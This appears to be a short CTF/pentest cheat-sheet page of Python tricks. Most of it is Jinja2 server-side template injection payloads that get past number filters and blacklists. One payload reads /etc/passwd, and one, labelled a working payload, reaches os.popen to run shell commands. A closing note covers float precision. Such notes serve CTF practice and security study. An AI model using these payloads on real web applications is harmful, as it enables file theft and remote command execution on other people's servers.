Skip to content

Python

python's main site: https://www.python.org/

python package index: https://pypi.org/

Numbers using True and False

  • Python numbers can be formed using only True and False values 
str(True+True+True+True)+str(False+False) # 40
  • This can be used to bypass numbers filters in python based web app
{{ ''.__class__.__mro__[str(True+True)].__subclasses__()[str(True+True+True+True)+str(False+False)]('/etc/passwd').read() }}

Keep in mind this is only an idea not really a POC some tweeking maybe needed

Blacklisted numbers

  • When numbers are blacklisted, you can use attr instead, something like this 
{{[]|attr(dict(__cla=x, ss__=y)|join)}}
{{[]|attr(dict(__cla=x, ss__=y)|join)|attr(dict(__base__=x)|join)|attr(dict(__subclas=x, ses__=y)|join)()}}

example working payload 

{{get_flashed_messages|attr(dict(__globals__=x)|join)|attr(dict(get=x)|join)(dict(__builtins__=x)|join)|attr(dict(get=x)|join)(dict(__import__=x)|join)(dict(os=x)|join)|attr(dict(popen=x)|join)(dict(ls=x)|join)|attr(dict(read=x)|join)()}}

Floating point Limitation

  • Python has a floating point limitation, if the value of the float stored is too long, the value that python actually returns will not be exactly the same

  • This can be a limitation in exploit development but can also be used to bypass certain things, for example disproving Fermat's last theorem, for this refer to UgraCTF